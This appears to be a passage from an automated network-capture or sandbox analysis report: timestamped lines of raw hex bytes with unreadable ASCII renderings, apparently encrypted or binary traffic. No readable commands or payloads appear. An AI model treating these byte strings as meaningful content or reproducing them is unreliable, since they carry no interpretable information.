b1 80 66 2b e6 cd 4d cb 98 74 98 c6 e1 5b 7f 5f 12 9c 6e
                                                        Data Ascii: ,t.$H1fMHY0cGQ :JO\'JkF7f[i|6M|x<T!*wa7ZLeZD<3RG|45Fl{.t9jh{[/5loF52wDV4x3Y95M66rx5lj5-oBnef+Mt[_n
                                                        2021-12-16 12:20:36 UTC93INData Raw: 0e 86 b8 c5 20 53 af 9e 6e 7d f1 5b 39 11 6c 91 75 39 7a 08 6e 8d a6 f5 d6 90 94 81 fd 69 e2 e4 95 fb c2 02 ed 14 ba dc 6e b3 cf eb 96 ae f0 22 c0 70 ff 57 e4 04 20 3d a8 10 21 dc 41 53 76 2b dc 36 ac b1 ed 97 4a ad a6 6a 53 43 f8 8c 66 b7 bc be 58 21 7a 7d cd 86 24 1a 52 c4 b2 87 32 fa 0f 4b 77 e1 95 d6 b5 47 60 37 92 05 c3 43 6f 33 5f a0 a7 b6 1e 0e 2e b0 9e 5e ca bc 89 ca a5 6f 57 d9 47 08 3c e3 89 10 d3 91 c9 60 0c 9a 54 64 c1 e8 6c bf ff 8f 41 8c d6 3c 10 5d 57 2b d3 74 d6 4c 96 b1 76 7c 84 67 f8 ab 88 96 6d 7f c2 68 83 00 31 4c 8f ee 73 97 ce 29 89 a0 a1 22 81 aa 88 02 3d 88 89 49 06 4e 09 a2 f8 b1 9a ec 9c 64 06 43 4c 0c 7d 02 ba 62 b7 e6 a8 31 0e fe 10 12 6c 03 67 4b 4a bd 6d e4 60 a0 f1 9b 64 dc 29 b1 39 6e 38 3b d2 d8 f4 41 ca 68 de 87 a2 d2 37
                                                        Data Ascii: Sn}[9lu9znin"pW =!ASv+6JjSCfX!z}$R2KwG`7Co3_.^oWG<`TdlA<]W+tLv|gmh1Ls)"=INdCL}b1lgKJm`d)9n8;Ah7
                                                        2021-12-16 12:20:36 UTC95INData Raw: 3b 6f c4 fe 3b 29 2e b0 f5 99 67 e3 08 b2 07 13 ca c2 46 a1 19 46 12 47 58 30 d1 7f 3e 47 51 d3 de 38 86 25 f5 d1 55 4d 9e 95 69 ba f2 f2 23 52 6e 12 24 36 18 cd d0 63 5e 10 6e f9 86 b6 cf ff 97 45 d2 80 79 de ef 7e 10 97 3e 88 4a 1d d2 f9 04 13 ba b9 99 05 49 ec 25 56 ba a4 a4 26 ce 08 1f 08 4b 8f 0b 85 75 2c bc 39 45 12 1b 2b 8a d9 d8 a5 5e f2 80 eb 0d ba f7 7f 4b c1 27 7d cc 6c 1c 57 32 b4 7f 34 93 b9 ea 32 b7 a6 d6 b5 6e ee 16 57 8f 4f d0 1b 2f dc 35 c6 58 6f fd 46 43 32 79 c2 69 d5 b0 e9 09 a0 cb 2f bb 12 96 b3 f1 80 2c 20 d1 e1 01 90 23 d8 f9 eb d9 2d 32 ca f5 b0 ef 4c b9 f3 35 66 a9 b5 8f 31 f6 68 ee 12 c0 50 73 5e 8a 60 c8 83 b0 93 60 62 ec 37 9e 34 1a 00 c7 dd 88 2d ab 60 7f dd 65 85 b2 ac 9b 7f 04 ba 2c 4c 35 bc 50 90 a8 ea 73 a5 44 1b 89 0b 04
                                                        Data Ascii: ;o;).gFFGX0>GQ8%UMi#Rn$6c^nEy~>JI%V&Ku,9E+^K'}lW242nWO/5XoFC2yi/, #-2L5f1hPs^``b74-`e,L5PsD
                                                        2021-12-16 12:20:36 UTC96INData Raw: 84 af bc 80 79 b4 98 43 6a 0e 46 15 13 74 9a 7e 3e 63 ec 6f ad be e2 dd 91 93 99 25 68 d2 a4 be eb f3 e1 f5 02 bd 9f 12 b1 4d e3 bc dc 34 59 1e 61 eb 40 ce 12 19 38 ab 66 e9 cf 45 43 78 46 0d 22 bf b0 96 64 49 bf ad 52 57 42 ca 9c 66 e3 b9 ac 5b 09 d6 7c cd 82 35 0a 50 c4 b8 ad 94 86 ee 4d 64 e3 87 f8 25 3d b9 3d be 0a e9 16 b1 33 59 d7 98 2e 65 db 54 b4 8c 03 5c b9 a9 33 58 14 8b e8 4c 24 04 7b f2 f6 a0 cb cc 0f 6d e2 56 6d 62 7f 49 97 cc 8d 45 fb 25 34 13 48 75 03 bc 67 e6 49 be 20 72 7c 82 4f 57 aa 88 92 48 6d f9 dd aa 38 37 49 ad a2 51 b2 ec 32 82 88 85 33 88 af db 2a 3f 88 03 1b dc 4e 21 36 d1 1e 91 c0 91 6a 3e 52 4b 22 36 2b b8 68 63 9c bb 21 4a 99 11 12 68 17 60 3e 92 95 15 e0 ee 11 9b a3 73 06 3e 94 2a 65 00 e7 e2 dc f4 89 b1 b4 de 87 a6 c3 3c c9
                                                        Data Ascii: yCjFt~>co%hM4Ya@8fECxF"dIRWBf[|5PMd%==3Y.eT\3XL${mVmbIE%4HugI r|OWHm87IQ23*?N!6j>RK"6+hc!Jh`>s>*e<
                                                        2021-12-16 12:20:36 UTC97INData Raw: 67 fb 69 c8 2d 2e a5 d3 16 60 39 08 b3 13 cb de ea f4 b7 0a 49 02 9a 58 30 db 10 5f 40 46 27 f9 05 8e 22 c6 bb a9 5d 9b 86 b1 aa d5 e8 24 48 87 c9 4a 34 1e cc ec 67 5d 7f 45 fe 9d 42 d9 09 8e 5b c7 f3 aa 7f ef 7a 0c 82 2a 86 34 2f cd 07 0f 20 89 de 18 d3 49 e6 3c 44 b8 ad b1 0c 49 16 e1 09 61 89 02 cf bc 29 0a 32 53 05 64 91 78 d9 d2 dc e7 9f 82 e1 0a b6 f3 7d 43 e9 8a 7a d6 94 06 14 56 b0 78 43 54 8f ec 27 a2 da e4 b7 7f e1 1f a5 99 b5 b4 12 2d af 8b a8 35 6b f7 55 5c 26 72 fb 41 c9 b9 11 67 e3 c3 26 de e3 87 b8 fd 8e 28 5c e3 e3 10 9f 50 49 fa c7 c5 0d 3c 12 e3 0b c6 3d bf 80 e6 4b b4 ae f7 cf db 6b e4 18 b2 2c 74 5e 91 43 cf 76 b7 ae 6d 1a c8 30 9e 2f 70 70 cf 23 83 27 b8 45 6d 33 59 74 5c 5d a0 78 38 f7 e3 b1 ca 8f 7d a0 b9 2c 5b 7f 51 0f 84 70 61 9e
                                                        Data Ascii: gi-.`9IX0_@F'"]$HJ4g]EB[z*4/ I<DIa)2Sdx}CzVxCT'-5kU\&rAg&(\PI<=Kk,t^Cvm0/pp#'Em3Yt\]x8},[Qpa
                                                        2021-12-16 12:20:36 UTC98INData Raw: e3 7c e6 87 bc fd 00 d2 f1 e8 9b 5e 02 a4 67 4a 51 f0 2c d5 2b 58 0d f0 df 3b 93 85 69 d9 a6 88 c5 1e f8 7e 69 5c 19 af 64 88 0c d4 d4 c6 a6 33 11 fb ac fe 2c c8 9a 43 af 09 c9 9c 3e 3f 86 bf 81 a8 13 7b c0 b1 bd 7e b8 48 5c 16 ba a3 0a 53 4a 4b 1d 7d c7 f5 09 20 a3 be 01 e0 c7 4e 9f 6f 48 e7 01 d9 94 c0 62 ee 74 0d 52 56 14 6a 96 de b1 8d 12 21 55 d2 34 42 bc 7d d2 79 a2 17 56 2d 52 02 10 b5 2a 6d c9 28 e3 01 24 b5 cb 86 61 e3 02 9f 27 1d d2 ea ed b9 e7 4d 16 5e 2b 8b da 10 48 4e 48 d5 f8 21 96 c4 d4 92 ad 67 50 83 43 ab f1 fd d9 4b d8 77 4c 2c 65 d5 f7 74 5c 60 5d f7 86 b4 c4 db 85 70 c8 89 42 02 e0 7f 10 95 32 8a 25 22 c6 07 0f 20 82 c1 7b 04 41 f9 3c a4 aa 84 b3 36 49 30 42 f7 b2 61 02 c0 51 1e bf 33 f2 03 17 44 a9 d9 d8 be 27 8c 86 d3 95 a9 fa 6e 46
                                                        Data Ascii: |^gJQ,+X;i~i\d3,C>?{~H\SJK} NoHbtRVj!U4B}yV-R*m($a'M^+HNH!gPCKwL,et\`]pB2%" {A<6I0BaQ3D'nF
                                                        2021-12-16 12:20:36 UTC99INData Raw: f1 fe 93 ec 5c 22 a6 39 4b a9 7f cb d2 43 a8 3e 56 6f 00 dc 6a fa 3b a3 c6 09 0b d6 5b 25 ca 86 91 81 d1 a5 32 82 67 db eb 41 ff eb c0 c9 83 11 40 26 b6 f1 e6 cd ba 31 7a 1e 72 f4 8a 97 d0 27 41 12 76 74 89 a3 d1 b0 46 cc 37 e8 a3 bc 4f 99 73 7b 41 4a 9a cc ef c5 9f 15 2b a8 aa 42 db 60 c0 37 8b 8f 9b 68 23 69 10 cb 39 2c d6 1e f9 b7 96 0b 91 bf bb 77 d6 e6 2c 8d ed 06 d8 c6 20 d4 4f 67 95 1a 81 be bb 8e 4d bd 66 45 51 ff 45 42 1f 6d 91 7a 00 d0 12 6e 81 a3 e6 c5 94 94 90 de 76 eb 58 94 c5 d7 00 96 1b a0 ec 63 dc e7 e9 96 a4 29 34 d3 64 eb 55 e7 0c 3d c4 bd 37 38 cd 3e 57 7b 3d d2 1b a8 4b 06 65 56 b0 b4 7d 57 40 ff 81 75 5b b8 80 57 0b ad 6f cc 80 19 30 30 db a6 bc 87 fb 1e 48 7b f7 7a d1 9b 3a 92 96 8d 10 d2 3d b3 22 5a b8 4f 2d 49 cc 2c cb 94 30 54 b9
                                                        Data Ascii: \"9KC>Voj;[%2gA@&1zr'AvtF7Os{AJ+B`7h#i9,w, OgMfEQEBmznvXc)4dU=78>W{=KeV}W@u[Wo00H{z:="ZO-I,0T
                                                        2021-12-16 12:20:36 UTC101INData Raw: 75 98 10 aa 92 9a ad fe e3 bd 59 65 b2 66 43 42 05 06 df 20 46 16 f7 d0 a3 da ee 6d 49 b3 85 cf a0 88 2c 97 5d 3f be 4a 89 32 a8 3a 3c 36 92 3b fb b5 c9 3f cd 8e 2d 75 02 1e 8a 54 1e 45 b7 d6 cc 13 7b ca b2 ce 7d 47 49 74 05 8e db 90 3c e0 41 60 78 d1 df 0d 20 9f bd 09 d0 ce b0 9e 98 42 e0 14 d7 0b c1 62 e0 67 05 5d 5e 73 b6 69 df 9b a3 06 29 5d b5 5c bc bd 5b 8a 69 ab b4 49 28 46 57 18 b2 f4 6f d8 fa e4 25 41 e1 e3 14 6a 3f 0f 99 13 06 ce ea e5 a3 19 4a 3a 4b 7b 30 d1 10 4e 45 51 c2 c8 2c 8d 3d d4 be a9 90 9e 9f 5e a9 a9 98 29 4b f4 79 3e 08 18 c7 f7 59 53 57 7a f9 86 ba ab a6 86 5c cb f4 43 2f 80 b7 11 91 29 8c 0d b9 d2 f9 04 01 a8 45 75 04 43 ea 3f 24 38 a8 b1 17 64 c8 1e 08 4b 8d 01 ec 2d ba be 33 59 10 11 6f 45 cb de 87 a4 9d 82 e1 14 ac f9 7f 43 86
                                                        Data Ascii: uYefCB FmI,]?J2:<6;?-uTE{}GIt<A`x Bbg]^si)]\[iI(FWo%Aj?J:K{0NEQ,=^)Ky>YSWz\C/)EuC?$8dK-3YoEC
                                                        2021-12-16 12:20:36 UTC102INData Raw: e1 96 01 59 17 af 3d 4c ba 02 cd 2d 42 80 b3 f6 c4 d1 b2 fe fa 4a 31 57 db 26 d4 76 3f e2 19 69 7e 3f 8a 2d 8e 99 c9 f7 4d f7 49 15 c5 9c c3 53 23 a7 f6 f0 d0 7c 97 55 15 70 8f 8b 90 c7 dd 6c 28 69 7f 9f a5 c0 a4 57 2d 3d 3a a1 88 57 bc 73 62 44 57 77 c9 dc dd 9a 11 50 b5 ad 5d c7 f1 4b 19 9c 87 f7 bc 31 6d 18 c3 02 b3 d4 0f f6 be 87 9a 39 93 ab 7f b2 f1 3e 8b e9 78 58 db 39 20 43 54 88 0b ff b0 ab 8b 56 b9 b0 de 7f f0 4d 2f 09 03 38 7e 39 7f 0d 74 92 ba f5 c7 97 88 7f da 45 ee ae 96 92 c2 03 ed 11 ce 74 67 b3 47 e2 8b bd 30 22 d1 67 f4 56 1c 12 1f 18 be 60 39 ce 45 43 78 3e ad 3e be b4 fd f5 9b be a7 7e 7f c8 f8 9e 6c b3 a3 c3 f2 09 d6 76 d2 93 0e 1b 50 d5 b4 b0 94 05 0e 61 7e e5 ff de b6 3c bd 31 1c b6 77 10 29 31 5f ae a7 34 0a 78 2e b0 90 2e 43 ae 8f
                                                        Data Ascii: Y=L-BJ1W&v?i~?-MIS#|Upl(iW-=:WsbDWwP]K1m9>xX9 CTVM/8~9tEtgG0"gV`9ECx>>~lvPa~<1w)1_4x..C
                                                        2021-12-16 12:20:36 UTC103INData Raw: 99 14 b8 fe 22 34 fc e9 91 4c 00 c6 ce 43 46 04 32 f4 3a 44 00 e1 d2 32 60 7a 44 f7 a6 87 be 19 e6 77 93 59 1d 36 4d 8d 3e a8 35 56 f0 3b 3b f1 a0 c0 3d cc 36 52 ab 10 e7 9d 12 21 92 c8 b7 37 13 7f c6 de 29 66 46 43 6a 08 b9 dd 88 57 56 bf 61 5e d1 f7 76 35 ae be 0d e0 e3 98 04 41 42 ea 13 bc e8 68 62 ea 61 1a 4d 52 1c 6c 6c c1 63 8e 26 3a 57 a1 27 bd bd 55 cd 56 39 68 58 26 44 1c 61 10 2a 65 da c9 eb 3e 2a b6 f2 10 78 1d 09 9f 1c 05 a5 e4 e4 a1 1d 23 a7 54 58 3a d1 09 5d 41 51 c8 fc 36 87 c4 d4 92 80 4e e5 91 4e ab fd e1 5c 46 f5 7d 4f 5b 92 c5 f6 7e 32 7d 2f ea 87 bc dc f3 ac c7 c3 8e 4b 69 f1 11 b9 91 2f 8c 3a 21 c3 fd 0e 1d 84 c9 60 fa 48 ca 0d 58 d0 a6 b0 1d 48 16 92 23 4d 9e 04 e7 4b 38 a3 63 cf 0a 00 5b 33 45 d1 b7 2a 03 8b f2 1b 35 f3 74 50 75 92
                                                        Data Ascii: "4LCF2:D2`zDwY6M>5V;;=6R!7)fFCjWVa^v5ABhbaMRllc&:W'UV9hX&Da*e>*x#TX:]AQ6NN\F}O[~2}/Ki/:!`HXH#MK8c[3E*5tPu
                                                        2021-12-16 12:20:36 UTC104INData Raw: 83 03 4e 06 bc 2a 44 b4 17 25 d2 6f a1 a1 e7 c6 d0 f1 5b fc 55 26 b6 ce 19 de 5d 2b d2 8b 6a 80 ec a9 15 df 66 25 38 56 fe ef 1e c5 8d 14 4c 2e 48 e1 cf de 43 26 67 18 6f 81 89 9e d0 32 65 1b 7e 99 8d 8f cd b2 57 bc 81 ff f7 5a a3 63 6c 7f 57 5f 64 dc cb ce a8 e9 51 88 bb 40 a4 01 4b 35 8f 8c e3 2c 32 6d 16 ca 08 3a de 0f ed a0 80 e2 6e 92 87 7f a5 87 87 8d e9 63 41 dc 33 d6 42 69 97 16 9d 40 ab a7 5c ac c8 55 78 9e 3a 22 10 6c 95 61 23 66 1a 6e 90 b4 ea cb 6f 95 ad d4 6d 91 24 97 e9 d2 3b 74 15 a1 ec 78 ad 5e e1 96 bf 3e 3d cc 9f ea 68 e9 02 36 3d 04 cc 24 ca 5a 4a 69 35 d6 33 b7 ab e8 64 48 93 96 7b 07 2f ee 9f 66 a1 ba fc 20 29 d7 7c c9 86 0c 1b d4 55 d3 c1 a2 04 0f 4d 64 8d db 67 22 3f e9 4c b2 00 c1 3c ad 57 3e d9 91 2d 65 d5 31 a2 89 39 54 ac 81 d3
                                                        Data Ascii: N*D%o[U&]+jf%8VL.HC&go2e~WZclW_dQ@K5,2m:ncA3Bi@\Ux:"la#fnom$;tx^>=h6=$ZJi53dH{/f )|UMdg"?L<W>-e19T
                                                        2021-12-16 12:20:36 UTC106INData Raw: 10 a3 e4 19 a7 fe f8 93 45 10 57 66 6f 57 0b 56 e5 28 40 04 e5 b8 6d 8d 85 45 db ae 8a d6 1f e7 66 9f 42 3a 53 4e a1 20 bb 28 31 46 2f ed d3 80 cf 2e c2 4b 5f ae 09 1d 83 2e 3d 98 b3 a8 3e 0c 70 3e b0 99 68 4f 56 68 5f 21 dc 99 53 55 4d 73 7a c6 e4 05 26 51 bf 25 f5 c9 a7 de ca 43 e0 05 ba 94 c9 62 fb 63 1d a0 57 30 75 50 b8 62 70 f5 36 46 d2 29 ad b5 4e cc 80 a1 46 41 29 51 0e 11 b5 fc 4d ef d7 e2 27 06 1e e1 14 6a 9e 29 b2 13 03 c1 f2 f6 a9 19 5d 32 4f a6 31 f7 1e 4a 46 df 6e e2 f3 9a e0 c6 b9 a5 56 8d 97 4f ba f1 fc 34 b4 f5 51 44 37 10 d9 20 5c d3 7d 54 f1 95 ba c7 31 97 54 c1 9f 49 60 e6 80 11 bd 20 85 2d 35 da 2f 26 87 82 d6 7d 09 56 ec 25 52 ab b9 b9 01 b2 09 33 05 4e 96 1d 3c 6a a5 be 33 59 09 0a 57 70 d9 c9 a7 2a 61 83 c7 0c aa f2 46 cd eb 9b 75
                                                        Data Ascii: EWfoWV(@mEfB:SN (1F/.K_.=>p>hOVh_!SUMsz&Q%CbcW0uPbp6F)NFA)QM'j)]2O1JFnVO4QD7 \}T1TI` -5/&}V%R3N<j3YWp*aFu
                                                        2021-12-16 12:20:36 UTC107INData Raw: 18 4e 07 be 40 42 aa 04 df c2 4a c3 2c e3 d7 dd b5 80 50 57 26 a3 d6 02 b8 7d 6a 91 93 92 eb ee a7 3b 84 44 1e c7 49 f7 fe 6d cb 9d 1c 57 3c aa 8a f4 b9 d4 32 56 1f 56 88 f5 39 d2 23 67 17 62 60 e3 0c c2 b5 5b 21 32 c3 cf 0b 5e 9c 79 67 55 52 75 cb 4f 29 89 17 51 8c 9d 43 df 05 48 4e 85 84 8c b6 5f f0 1e d5 20 a5 44 0f fc a9 89 dd 0f 92 ab 7f 81 ec 3b 87 37 1a 5c d5 28 a3 53 79 9f 0d 86 af ae 9c 38 75 2f 53 ab 7d 6c 39 11 6d ec 6e 38 75 16 6c fa b2 f4 d6 95 9d 97 b4 f9 fc a6 9f cf da 79 e3 14 a1 e8 65 c8 5d e8 96 aa 20 33 c4 d6 84 1f e2 13 39 1c be 60 39 ce 45 43 73 2b b9 b2 bd b4 f3 bc 5e b5 79 5a 55 2a f4 9f 66 a1 d6 2a 59 09 dc 6a a7 bd 75 e3 af 3b 6c a3 aa cc 0f 4d 6e cf bc d0 b7 36 67 37 84 2b c7 12 f2 2f 5f a4 b1 2c 65 d1 3c b0 9a 31 e2 bc 89 cc 6f
                                                        Data Ascii: N@BJ,PW&}j;DImW<2VV9#gb`[!2^ygURuO)QCHN_ D;7\(Sy8u/S}l9mn8ulye] 39`9ECs+^yZU*f*Yju;lMn6g7+/_,e<1o
                                                        2021-12-16 12:20:36 UTC108INData Raw: ad f9 1c b8 72 c6 9b 5a 1f 0b 76 47 52 1a 3b ee 01 e8 00 f0 dc 2a 79 ac a1 df b1 83 d3 9a e0 77 97 5c 21 b9 5b a5 97 be 2b 33 4d 13 d1 ff bf c8 39 45 31 43 af 08 0a 98 2f 2a 86 a4 35 19 13 7b c1 13 a4 60 52 5d 66 0c 95 75 99 53 40 46 74 5a 2d f1 0d 3d b9 33 0e ff ce b1 8a 57 56 f7 2d 03 87 c1 68 cc 40 5d 59 42 34 91 6c df 9b 99 87 2a 55 da 28 a8 a9 45 f3 dd a0 6a 52 38 7a eb 0a b9 2c 73 5d d1 e2 2d 2f a2 f7 00 48 40 08 b3 19 2f cf ea e5 ab 15 44 2e 7e b6 34 db 16 59 c8 56 d9 f8 28 9e 3e c4 ba bf 64 71 9b 4f ad 5b f2 23 5e e0 69 63 97 18 c7 fc 5c ec 7f 54 f1 aa be f3 1d 83 48 e9 62 45 7f e9 68 9d 96 2f 86 24 3e c4 ed 26 af 80 d6 7d 10 61 16 32 5a ad be 3c 1a 4c 08 1e 1c 59 8a 2d 49 42 2e b6 1b e0 03 17 4e 50 6d d8 af 3b a5 ec 14 f8 56 fd 7a 6e 18 9f 7f ca
                                                        Data Ascii: rZvGR;*yw\![+3M9E1C/*5{`R]fuS@FtZ-=3WV-h@]YB4l*U(EjR8z,s]-/H@/D.~4YV(>dqO[#^ic\THbEh/$>&}a2Z<LY-IB.NPm;Vzn
                                                        2021-12-16 12:20:36 UTC109INData Raw: 57 26 42 3f 4c ad 6b 46 d3 43 a6 a1 ec b8 5d b3 ef f6 7d dc ad da 0c b9 eb 38 da 9f fb 0d c1 a0 27 a6 c0 d8 c7 4f 98 fd 17 c5 96 43 7f 02 b0 f1 e7 c7 49 5f dc 14 70 85 b2 6c d4 23 6b 6b dc 65 8c a9 af 39 50 32 3c ec 87 a4 5c 96 78 b4 6e 46 75 a2 04 d1 89 1d 6a dd 54 bd 20 d1 5c 24 9a f0 b7 b2 30 6c 30 d9 3b 38 a3 34 fc a8 9e 9a c7 93 ab 7f 71 c0 d9 89 e9 6f 74 c3 0a de 42 78 de 6d 84 be a8 8b 52 af b5 44 7d f0 4c 39 11 6c a9 7e 39 75 1e 6e 81 bc f5 d6 91 94 83 db 69 fe e2 95 e9 d8 28 ec 15 a1 82 66 b3 4d ff 96 ae 36 22 c0 61 eb 46 e2 13 33 b1 bd 1b 37 d7 45 47 7a 9e d7 22 bf b8 f9 9a 49 bf a7 78 57 53 fa 9e 66 1c b8 ac 5b 93 d6 7c cd d3 1f 1d 50 d2 b2 af 82 fb 0f 4d 64 fc b4 d9 b7 c9 bb 37 92 ed c1 38 a2 2d d2 8f b1 2c 64 c2 27 c3 2d 31 54 b7 9a ca b6 12
                                                        Data Ascii: W&B?LkFC]}8'OCI_pl#kke9P2<\xnFujT \$0l0;84qotBxmRD}L9l~9uni(fM6"aF37EGz"IxWSf[|PMd78-,d'-1T
                                                        2021-12-16 12:20:36 UTC111INData Raw: ff 0a a5 91 56 99 5a 14 c6 72 43 46 04 26 e8 2f 2f 66 f0 d6 27 40 49 9b d7 a0 83 e9 10 f6 71 f8 0a 35 ad 45 51 33 b4 f5 2c 7c 13 0c fb bf c4 3d cd 1e 46 aa 09 1f 96 16 16 90 b3 b3 e8 13 7d ea b1 b5 65 5a 49 70 19 bd c5 99 6c 1d 41 6c 72 c6 f5 0d 3b af be 09 98 a9 b0 8b 59 42 e0 04 bf b7 c2 62 46 6b 07 5e b8 1c 7d 79 f7 9b 8a 0a 2b 26 61 2b bc b7 5d d3 11 1c 68 58 26 5f 78 9d b9 2a 6f db df 8d 4e 2e b6 e9 07 66 c8 50 a2 15 68 ba ea e5 ab 6d 0e 3a 56 59 23 df 17 30 d6 51 d9 f2 46 91 3b d5 b4 85 60 8f 9b 67 ac fc e3 21 25 34 7f 4b 3e 30 73 f6 74 52 53 46 ea 82 94 d0 20 84 5a ae 4e 43 7f e5 11 05 91 2f 8c 2e 3b d4 96 cf 0e 80 dc 70 2c ad e5 36 5c d5 3b b1 1d 46 67 67 08 4d 94 0e fb 44 41 da 33 53 09 3a db a6 d5 c9 a9 1d 98 93 ed 68 fe fa 6e 4c 35 9c 75 12 7f
                                                        Data Ascii: VZrCF&//f'@Iq5EQ3,|=F}eZIplAlr;YBbFk^}y+&a+]hX&_x*oN.fPhm:VY#0QF;`g!%4K>0stRSF ZNC/.;p,6\;FggMDA3S:hnL5u
                                                        2021-12-16 12:20:36 UTC112INData Raw: 0d bd 3b 46 7d 17 dd c2 45 bd b5 d3 0e 09 be fe f8 79 21 b8 de 65 81 5d 3a d0 49 96 87 af 6a 2f 8e 93 cc dd 5f 98 08 17 c5 9a 34 4a 22 b6 ea cb 81 46 30 50 3d 5e 8d 9a 90 bf 5b 6d 04 60 6c 8e a5 af 7f 53 32 3c de ba b2 33 68 72 6a 42 7f 7d cc c3 db a1 40 52 a4 ad 6a f1 0d 4a 33 e4 fd 8c b2 3a 60 1e d3 45 e3 d4 0f f6 b7 93 ef 87 fc 5f 74 ad ee 3b a5 ff 68 5e ce 2c d9 6a 68 9a 09 82 d1 b6 8a 52 a5 a1 f3 7c f0 47 11 00 69 91 78 34 7c 3a 7c 84 bc f3 b9 8d 95 81 d1 45 f2 af bd fa dd 02 eb 3d 85 ec 67 b9 40 eb 90 c1 fc 20 c0 6b f4 7c f8 05 5c ce bd 1b 31 e7 5c 46 7a 37 fe 75 bd b4 ff b2 67 bd a7 7e 38 29 fa 9e 6c 8d 81 ae 5b 03 c5 7b da 93 15 25 01 c5 b2 af 93 fc 0d 36 53 e6 84 d4 d8 f7 bb 37 98 db d9 e0 a4 e9 48 72 3c 39 65 d1 2f a3 93 27 45 ba 8b b7 90 15 8b
                                                        Data Ascii: ;F}Ey!e]:Ij/_4J"F0P=^[m`lS2<3hrjB}@RjJ3:`E_t;h^,jhR|Gix4|:|E=g@ k|\1\Fz7ug~8)l[{%6S7Hr<9e/'E
                                                        2021-12-16 12:20:36 UTC113INData Raw: db ad fe e3 8c 80 71 7b 65 43 4c 61 d7 f8 29 46 d6 fd c9 18 7e 8f 45 ca ba 9a c9 e9 e6 5b 9e 65 76 52 b0 72 2b b3 38 32 59 2a 30 e4 93 30 2f e4 27 44 c0 f5 18 9c 38 3f 97 dc 69 34 13 71 df 9c a6 6f 46 58 7b 04 a7 23 98 7f 46 50 6a 6a 86 c5 0c 3b af a1 12 ec c5 b0 8f 48 5d c6 fb a5 ab e7 6b fd bd 00 31 aa 1d 7d 6e d8 f2 73 0b 2d 53 b5 f8 be bd 5b cc a4 cf b8 5a 2c 58 69 f4 b8 2a 63 06 db fd 0a 3d bd e3 05 6b fc 49 4d 12 2b fc ed 8a 5d 18 4c 3c 51 37 cc da 10 48 2a 80 db f8 23 9a e0 ba 6c ab 4c 94 97 20 54 f8 e3 21 55 b6 6e 40 34 09 cc ef 8a 59 53 58 ed 85 32 6f 32 5e 4f c8 83 5b 6c e4 7e 01 9a 30 be db 2b fc f5 1f 04 9c b9 8e 05 49 e0 29 63 b8 a3 b1 0c 47 17 11 f6 4c b2 08 fb 47 31 8c 5c aa 02 17 42 67 d6 cb a4 31 8e 89 f4 1c 57 fb 42 4d 9a 9b 7d cc 6c 14
                                                        Data Ascii: q{eCLa)F~E[evRr+82Y*00/'D8?i4qoFX{#FPjj;H]k1}ns-S[Z,Xi*c=kIM+]L<Q7H*#lL T!Un@4YSX2o2^O[l~0+I)cGLG1\Bg1WBM}l
                                                        2021-12-16 12:20:36 UTC114INData Raw: a8 31 26 9a 14 23 54 ad a6 0d 82 a0 ba 3a 92 57 a9 2f 35 b0 1a 9e 2d b5 12 b7 db 1e 8a e7 85 7c ee 51 67 22 6e a9 a5 57 7a ed b9 27 3c 67 08 ec 6d 39 6c 08 16 43 92 1f f1 0d f5 4a 73 17 31 a1 1c 9b 01 d8 de c9 fe 5f f1 df 20 78 59 dc 0b d8 e3 95 2c 5f 41 71 3e 86 44 62 ef 5e e2 37 4e 78 7c 67 6f df 11 f9 d1 78 c5 75 c1 1f 15 0e 93 c7 a8 7f f9 98 8a 63 79 aa 94 91 2f 53 08 58 f9 ee 74 87 35 af f6 0a be f5 f2 65 5b 32 af 71 50 42 12 3e f2 29 51 0b ef fd d3 6c a8 55 ca b6 86 cc 00 31 e6 f8 a6 34 ad 49 92 18 ad 20 39 48 30 24 cb 41 cf 02 c1 0e af 51 f6 e6 83 0f 3d 9b b3 a8 3d 0c 39 3e b0 99 42 4f 5e a6 1c d2 21 98 53 4c 46 0f 8e c7 f5 0b 54 7e bc 09 f5 d9 6a f1 91 40 e0 0f cb 7d c0 62 ec bd 0a 41 15 0f 76 68 ce 96 90 3b d3 54 f6 22 bf b4 46 0d ef b3 6e 47 1e
                                                        Data Ascii: 1&#T:W/5-|Qg"nWz'<gm9lCJs1_ xY,_Aq>Db^7Nx|goxucy/SXt5e[2qPB>)QlU14I 9H0$AQ==9>BO^!SLFT~j@}bAvh;T"FnG
                                                        2021-12-16 12:20:36 UTC115INData Raw: 21 4f 93 e3 01 9a 4c b7 fb eb d1 23 0e ec e4 b7 c5 2a c4 b7 32 4b b0 a6 92 64 9d 6a ee 10 ad 29 0c 19 81 46 dd 8a b5 ff 26 0c db 31 9c 45 3d 6e c5 d9 86 64 61 6c 68 01 74 8e de eb 8b 66 3e ee dd b7 b7 fe 7c a0 bd e3 59 04 08 1a 8f 60 04 a1 5b 40 be f4 0e 72 a8 bb ca 01 01 e0 e9 91 b9 a4 e5 f8 47 10 b6 6d 28 36 3a c7 38 40 da 71 ea f8 be 42 3d ac b5 31 c4 c0 53 62 e1 38 53 fd 89 f4 e1 9c 01 6d 0b bc 47 4d ab 04 2c d3 43 bd a6 f2 d2 ef d4 ee fc 55 26 b8 df 13 28 5c 16 df 83 99 9b d3 a5 2d 9f 9c c6 39 48 db fb 15 c3 b3 4f 4e 30 b3 e0 f2 d3 5c ce 57 39 7e 8c 8d 4c c7 f5 e0 2f 6a 67 8d af d9 a6 54 32 27 c1 bd 5a 5d b0 64 68 3f 12 65 cd c7 d3 f2 51 51 a4 af 4a c9 0c 62 0d 8a 85 86 ac 23 68 1c c4 2f 36 df f1 fd 84 99 fd ba 8c a1 66 a8 e8 3c 88 f6 63 a0 c5 19 49
                                                        Data Ascii: !OL#*2Kdj)F&1E=ndalhtf>|Y`[@rGm(6:8@qB=1Sb8SmGM,CU&(\-9HON0\W9~L/jgT2'Z]dh?eQQJb#h/6f<cI
